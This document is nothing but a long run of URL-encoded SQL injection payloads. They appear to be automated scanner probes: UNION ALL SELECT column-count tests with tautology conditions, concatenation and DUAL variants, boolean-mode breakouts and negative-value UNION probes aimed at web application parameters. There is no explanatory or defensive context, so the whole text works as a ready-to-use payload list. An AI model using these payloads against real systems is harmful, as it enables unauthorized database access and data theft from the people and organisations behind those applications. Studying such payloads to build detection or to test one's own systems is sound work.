foo%20WHERE%206102%3D6102%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%209161%3D9161%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%203005%3D3005%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%202972%3D2972%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%207778%3D7778%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%207838%3D7838%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%209468%3D9468%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27rBMj%27%20FROM%20DUAL%20WHERE%202594%3D2594%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27BdoG%27%20FROM%20DUAL%20WHERE%207116%3D7116%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27lAif%27%20FROM%20DUAL%20WHERE%202695%3D2695%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27KuyO%27%20FROM%20DUAL%20WHERE%209292%3D9292%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27MNPh%27%20FROM%20DUAL%20WHERE%208818%3D8818%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27dsbX%27%20FROM%20DUAL%20WHERE%205843%3D5843%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27LyJZ%27%20FROM%20DUAL%20WHERE%208413%3D8413%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27AXyv%27%20FROM%20DUAL%20WHERE%205474%3D5474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27DxlA%27%20FROM%20DUAL%20WHERE%203276%3D3276%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27wuTo%27%20FROM%20DUAL%20WHERE%203483%3D3483%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27MDIx%27%20WHERE%201553%3D1553%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27JHWc%27%20WHERE%204210%3D4210%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27OqKg%27%20WHERE%206183%3D6183%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27LAgS%27%20WHERE%208226%3D8226%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27rvsY%27%20WHERE%209849%3D9849%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27AUPf%27%20WHERE%205149%3D5149%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27VGpW%27%20WHERE%206594%3D6594%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27HJSN%27%20WHERE%207731%3D7731%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27zDrX%27%20WHERE%203500%3D3500%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27paaP%27%20WHERE%202729%3D2729%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20cqWv%20WHERE%204933%3D4933%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20vpqz%20WHERE%203209%3D3209%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20jWwU%20WHERE%202574%3D2574%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20oLIC%20WHERE%206244%3D6244%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20Rawy%20WHERE%202382%3D2382%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20none%20WHERE%202003%3D2003%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20ARzi%20WHERE%208869%3D8869%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20hGmH%20WHERE%202768%3D2768%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20TBbY%20WHERE%206125%3D6125%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20vkVO%20WHERE%205444%3D5444%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27HpkL%27%20WHERE%208954%3D8954%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27ByAw%27%20WHERE%204909%3D4909%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27INZM%27%20WHERE%205349%3D5349%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27qyKd%27%20WHERE%202722%3D2722%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27hmnV%27%20WHERE%202416%3D2416%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27OjnC%27%20WHERE%203226%3D3226%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27ZzDo%27%20WHERE%202318%3D2318%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27aKlf%27%20WHERE%207218%3D7218%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27JwXB%27%20WHERE%206411%3D6411%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27TqRY%27%20WHERE%205283%3D5283%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -8091%29%20UNION%20ALL%20SELECT%201401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401--%20 -3808%29%20UNION%20ALL%20SELECT%204564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564--%20 -2350%29%20UNION%20ALL%20SELECT%209948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948--%20 -1290%29%20UNION%20ALL%20SELECT%207096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096--%20 -3125%29%20UNION%20ALL%20SELECT%203823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823--%20 -1819%29%20UNION%20ALL%20SELECT%207003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003--%20 -3979%29%20UNION%20ALL%20SELECT%203751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751%2C3751--%20 -6962%29%20UNION%20ALL%20SELECT%203375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375--%20 -3465%29%20UNION%20ALL%20SELECT%202248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248--%20 -7319%29%20UNION%20ALL%20SELECT%207898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898%2C7898--%20 -9477%27%29%20UNION%20ALL%20SELECT%206582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582--%20 -5194%27%29%20UNION%20ALL%20SELECT%207100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100--%20 -1468%27%29%20UNION%20ALL%20SELECT%207395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395--%20 -2923%27%29%20UNION%20ALL%20SELECT%209061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061--%20 -7048%27%29%20UNION%20ALL%20SELECT%203424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424--%20 -6530%27%29%20UNION%20ALL%20SELECT%207457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457%2C7457--%20 -6021%27%29%20UNION%20ALL%20SELECT%205344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344%2C5344--%20 -2399%27%29%20UNION%20ALL%20SELECT%205380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380%2C5380--%20 -9319%27%29%20UNION%20ALL%20SELECT%201782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782--%20 -8612%27%29%20UNION%20ALL%20SELECT%202226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226--%20 -7813%27%20UNION%20ALL%20SELECT%208232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232--%20 